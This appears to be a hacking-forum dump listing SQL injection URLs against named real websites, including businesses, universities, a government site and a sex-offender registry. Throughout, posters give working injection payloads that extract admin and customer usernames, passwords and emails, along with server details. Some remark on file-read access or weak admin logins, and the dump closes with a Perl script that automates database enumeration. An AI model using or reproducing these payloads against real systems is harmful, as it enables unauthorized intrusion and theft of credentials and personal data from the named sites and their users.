Site: http://www.liveauctiontalk.com TIC: 0 PR: 3
Code:
http://www.liveauctiontalk.com/cms.php?id=-12+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,group_concat(0x0b,login_id,0x3a,password),6,7,8,9,10+from+lat_admin--+
http://www.liveauctiontalk.com/cms.php?id=-12+union+select+1,2,now(),4,group_concat(0x0b,customer_id,0x3a,password,0x3a,email),6,7,8,9,10+from+lat_customer--+
version - 5.0.77
user - [email protected]
database - liveauction
os - redhat-linux-gnu
==========================================
Site: http://www.thebomarestaurant.com TIC: 0 PR: 1
Code:
http://www.thebomarestaurant.com/cms.php?id=-17'+union+select+distinct+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,vfsl_mem_email)+from+vfsl_member--+
http://www.thebomarestaurant.com/cms.php?id=-17'+union+select+1,2,group_concat(0x0b,vfsl_adm_log_id,0x3a,vfsl_adm_pass,0x3a,vfsl_adm_email)+from+vfsl_admin--+
version - 5.0.26-standard-log
user - [email protected]
database - vfsl
os - pc-linux-gnu
==========================================
Site: http://ricebrokeronline.com TIC: 0 PR: 1
Code:
http://ricebrokeronline.com/cms.php?id=-3+union+select+1,2,3,group_concat(0x0b,user_name,0x3a,password),5,6,7,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)+from+administrator--+
version - 5.1.46-LOG
user - TUGLOBEX_RICEBRO@LOCALHOST
database - TUGLOBEX_DBRICEBROKER
os - UNKNOWN-LINUX-GNU
==========================================
Site: http://e-ricelab.com TIC: 0 PR: 1
Code:
http://e-ricelab.com/cms.php?id=-4+union+select+1,2,3,group_concat(0x0b,user_name,0x3a,password),5,6,7,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)+from+administrator--+
version - 5.1.46-LOG
user - TUGLOBEX_RICEBRO@LOCALHOST
database - TUGLOBEX_DBERICELAB
os - UNKNOWN-LINUX-GNU
http://www.ry7.ru/index.php?s=-58+union+select+group_concat(0x0b,TABLE_NAME)+from+information_schema.tables--
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+select+concat_ws(char(58),@@version,user(),database(),@@version_compile_os),2,3,4,5+--
version : 4.1.22-log
user : u15962@localhost
database : u15962
os : portbld-freebsd6.2
I couldn't find a table with usernames, only pwd
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+select+group_concat(pwd,0x3a+SEPARATOR+0x0b),2,3,4,5+from+users+--
File read access is available
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+select+load_file(0x2f686f6d652f),2,3,4,5+from+users+--
Site: http://www.wifiarab.com TIC: 0 PR: 3
Code:
http://www.wifiarab.com/module.php?id=-5+union+select+concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),2--+
http://www.wifiarab.com/module.php?id=-5+union+select+group_concat(strUsername,0x3a3a,strPassword),2+from+tbladmin--+
http://www.wifiarab.com/module.php?id=-5+union+select+group_concat(strEmail,0x3a3a),2+from+tblemaillist--+
version - 5.0.91-log
user - [email protected]
database - wifiarab
os - unknown-linux-gnu
==========================================
And 2 blind ones =\
==========================================
Site: http://www.plastic-jeunesse.ru TIC: 100 PR: 4
Code:
http://www.plastic-jeunesse.ru/php/content.php?id=1041+and+substring(version(),1,1)=5--+
version - 5.x
==========================================
Site: http://www.urolocus.ru TIC: 450 PR: 3
Code:
http://www.urolocus.ru/php/content.php?id=219+and+substring(version(),1,1)=5--+
version - 5.x
http://www.torus.com.au/index.php?page=games&id=-53+union+select+1,concat_ws(char(58),user,password),3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user+where+user=char(119,119,119)
user() : www@localhost
version() : 5.0.77
database() : website
OS: Red Hat
File_priv : Y
PR-4
This is for the hockey
Code:
http://www.bma.cz/forum/forum.php?id=-4+union+sele ct+1,concat_ws(0x3a,v ersion(),database(),user()),3,4,5,6--
Database Version : 4.1.21-log
Database name : bma_cz
User : bma_cz@localhost
OS : pc-linux-gnu
----------------------------------------
Code:
http://www.drsteiner.cz/en/detail.php?id=-32+union+select+1,concat_ws(0x3a,version(),database(),us er( )),3,4,5,6,7,8,9,10,11,12,13,14,15--
Database Version : 5.0.32-Debian_7etch12-log
Database name : drsteiner
User : [email protected]
OS : pc-linux-gnu
The admin panel login and password are childishly simple
----------------------------------------
Code:
http://www.schnauzer.cz/chst_raz.php?id=-4+union+select+1,concat_ws(0x3a,version(),databa se(),us er()),3,4,5,6,7,8,9,10,11--
Database Version : 4.0.24'-Max'-log
Database name : schnauzercz
User : schnauzercz@thor
OS : mandrake-linux-gnu
Code:
http://www.zou.ru/popup.php?id=-1184+union+select+concat_ws(0x3a,database(),version(),user()),2,3+from+users%20--
Database: 111
Version: 5.5.0-m2-community
User: zou@localhost
PR: 4 TIC: 300
Found the passwords, but I can't find the admin panel. Take a look, maybe someone will get lucky.
Code: http://lostandlonesome.com.au/release_detail.php?desc=bart-&-friends-make-you-blush&id=-1+union+select+1,2,3,concat_ws(0x3a3a3a,version(),database(),user()),5,6,7-- 5.0.51a-3ubuntu5.4:::lostandlonesome_new:::[email protected] 0.206.16 PR:4
Site: http://www.jazzimpuls.nl TIC: 0 PR: 5
Code:
http://www.jazzimpuls.nl/show.php?id=-79'+union+select+1,2,unhex(hex(concat_ws(0x0b,version(),user(),database(),@@version_compile_os))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+
version - 4.1.11
user - jazzimpu_root@localhost
database - jazzimpu_user
os - redhat-linux-gnu
============================================
Site: http://www.doctordavidclark.com TIC: 0 PR: 4
Code:
http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,group_concat(0x0b,login,0x3a,pass),8,9,10+from+ddc_admin--+
http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,now(),5,6,group_concat(0x0b,email,0x3a,pass),8,9,10+from+ddc_members--+
http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,now(),5,6,group_concat(0x0b,username,0x3a,user_password,0x3a,user_email),8,9,10+from+ddc_users--+
version - 5.0.91-log
user - [email protected]
database - nexdoctordavidDB
os - unknown-linux-gnu
============================================
Site: http://www.gaycity.nl TIC: 0 PR: 3
Code:
http://www.gaycity.nl/shownw.php?id=-351'/*union*/union/*select*/select/**/1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+
version - 4.1.22-community
user - gayamsterdam@SERVER1
database - master
os - Win32
============================================
Site: http://www.listenlive.nl TIC: 0 PR: 0
Code:
http://www.listenlive.nl/show.php?id=-19833+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,unhex(hex(group_concat(0x0b,user,0x3a,password))),20,21,22,23+from+mysql.user--+
http://www.listenlive.nl/show.php?id=-19833+union+select+1,2,3,now(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,unhex(hex(group_concat(0x0b,username,0x3a,password,0x3a,email))),20,21,22,23+from+members--+ version - 5.0.37-log user - stations@localhost database - stations os - unknown-linux-gnu
Code: http://www.4wdsystems.com.au/index.php?id=-1+union+select+1,concat_ws(0x3a3a3a,version(),database(),user()),3,4,5,6,7,8,9,10-- PR 2 5.0.90-community-log:::wc449836_db:::wc449836_jess@localhost
http://www.grate.ru/index.php?cat_id=-5+union+select+group_concat(0x0b,table_name),2,3,4,5,6,7,8,9,10+from+information_schema.tables--
Code: http://www.swiss.org.au/home.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a3a,version(),database(),user()),10,11,12,13,14,15,16,17,18,19-- 4.1.22-standard-log:::swisst db:::[email protected] PR 4
.edu sites and the like, PR>5
MS_ACCESS
http://www.cortland.edu/polsci/default.asp?page_id=-19+union+select+1,2,3+from+"table"
PR-6
---------------------------------
MSSQL
http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=(select+top+1+@@version+from+information_schema.tables)--
@@version : Microsoft SQL Server 2005 - 9.00.3080.00
OS : Windows Server 2003
Platform : Intel X86
PR-6
--------------------------------
MS_ACCESS
http://www.ndus.edu/reports/details.asp?id=-245+union+select+1,username,3,4,5,6,7,8,9,10,11,12,13,14+from+"table"
PR-6
--------------------------------
MySQL
http://www.rch.org.au/plastic/edu.cfm?doc_id=-5860+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database(),@@version_compile_os),1),1),6,7+from+users/*
PR-6
--------------------------------
MSSQL
http://www.pace.edu/page.cfm?doc_id=14128&frame=news/read.cfm?id=829+or+1=@@version
PR-7
--------------------------------
MS_ACCESS
http://cooklibrary.towson.edu/getResourcesBySubject.cfm?subjectID=-77+union+select+1,2+from+"table"
PR-7
--------------------------------
http://historywired.si.edu/object.cfm?ID=123+or+1=@@version
@@version : Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Enterprise Edition
OS : Windows Server 2008 (x64)
PR-8
I'll modestly continue the school theme
Code:
http://sch1265.ru/pages.php?id=-28+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5%20--
Database: sch1265_base
Version: 5.0.83-0ubuntu3
User: sch1265_sch1265@localhost
PR: 6 Code: http://www.rso.cornell.edu/progressive/articles.php?id=196'+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10+LIMIT+1,1%23 PR: 6 Code: http://news.mainemaritime.edu/articles.php?id=-26'+union+select+1,2,3,4,unhex(hex(version()))+--+
PR 3 Code: http://tnt.ya1.ru/interesno/gallery.php?id=-27+union+select+1,group_concat(uname,0x3a,upasswd),3,4,5+from+users--
Site: http://agenda.gaynews.nl TIC: 0 PR: 4
Code:
http://agenda.gaynews.nl/show.php?id=17349'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),1,63),+floor(rand(0)*2)))--+
version - 4.1.22-community
user - gayamsterdam@SERVER1
database - master
os - Win32
============================================
Site: http://www.crew4you.nl TIC: 0 PR: 1
Code:
http://www.crew4you.nl/show.php?id=22'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+cfy_users--+&hid=0
http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+cr_users--+&hid=0
http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+dg_users--+&hid=0
http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+md_users--+&hid=0
http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+dg_clients--+&hid=0
version - 5.1.45
user - forest_music@localhost
database - forest_music
os - redhat-linux-gnu
============================================
Site: http://www.tekcursus.nl TIC: 0 PR: 0
Code:
http://www.tekcursus.nl/website/show.php?formid=2+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),1,63),+floor(rand(0)*2)))--+
version - 4.1.12-standard
user - datekcursu_webdb@localhost
database - datekcursu_webdb
os - pc-linux-gnu
============================================
I'm tired of this MS Access stuff, dumping it =\
============================================
Site: http://www.spokanemarcom.com TIC: 0 PR: 4
Code:
Output of several records with iteration:
http://www.spokanemarcom.com/news.asp?id=-99+union+select+1,(select+top+1+username%2bchr(59)%2bpassword+from+members)%2bchr(58)%2b(select+top+1+username%2bchr(59)%2bpassword+from+members+where+username%2bchr(59)%2bpassword+not+in+(select+top+1+username%2bchr(59)%2bpassword+from+members)),3,4,5,6,7,8,9,10,11+from+members%00
Plain output with iteration:
http://www.spokanemarcom.com/news.asp?id=-99+union+select+top+1+1,username%2bchr(59)%2bpassword%2bchr(59)%2bemail,3,4,5,6,7,8,9,10,11+from+members+where+username%2bchr(59)%2bpassword%2bchr(59)%2bemail+not+in+(select+top+1+username%2bchr(59)%2bpassword%2bchr(59)%2bemail+from+members)+order+by+id%00
============================================
+ a couple more sites with this DBMS..
============================================
Site: http://www.martinitiles.com TIC: 0 PR: 1
Code:
http://www.martinitiles.com/item2.php?id=197+union+select+1,2,data,4,5,6+from+msysaccessobjects+where+type=1%00
============================================
Site: http://www.uni-bright.com TIC: 0 PR: 1
Code:
http://www.uni-bright.com/item2.php?id=167+union+select+1,2,data,4,5,6+from+msysaccessobjects+where+type=1%00
http://www.ahfeixi.gov.cn/include/news_view.php?ty=1&ID=-11184+union+select+1,2,concat(user(),char(58),version(),char(58),database()),4,5,6,7,8,9,10,11,12,13,14-- PR-5
http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+concat_ws(':',version(),database(),user(),@@version_compile_os,@@tmpdir,@@datadir)),floor(rand(0)*2)))--+
5.0.77-community-nt:mostwanted:globaluname@localhost:Win32:C:\WI...
>400 databases > 40 tables tbladminuser
http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+concat_ws(':',username,password)+FROM+seodata.admin+limit+0,1),floor(rand(0)*2)))--+
http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+concat_ws(':',loginname,pass,admin)+FROM+resumex.users+limit+0,1),floor(rand(0)*2)))--+
As a little gift:
PHP: #!/usr/bin/perl -w # target use LWP::UserAgent; $ua = LWP::UserAgent->new; #my $proxy="http://xxx.xxx.xxx.xxx:port"; #$ua->proxy(['http','https'],$proxy); my $i=0; while(1) { my $req = HTTP::Request->new(GET => "http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+SCHEMA_NAME+FROM+information_schema.SCHEMATA+limit+$i,1),floor(rand(0)*2)))--+"); my $res = $ua->request($req); if ($res->as_string =~ /Duplicate entry(.+)for/) { open(FILE,'>>results.txt'); print "print $i: $1\n"; print FILE "$1\n"; close(FILE); $i++; } else {last;} }
www.cam-systems.ca/industry-news.php?id=99999999+union+select+1,concat(0x3a,0x3a,email,0x3a,0x3a,pass,0x3a,0x3a),3,4,5,6+from+tbl_account+limit+1,1%23 www.redebemreceber.com.br/news.php?id=999999+union+select+1,2,3,4,concat(0x3a,usuario,0x3a,senha,0x3a),6,7+from+usuarios%23 www.shereno.co.za/news.php?id=9999+union+select+1,concat(0x3a,login,0x3a,passwd,0x3a),3+from+cmsusers%23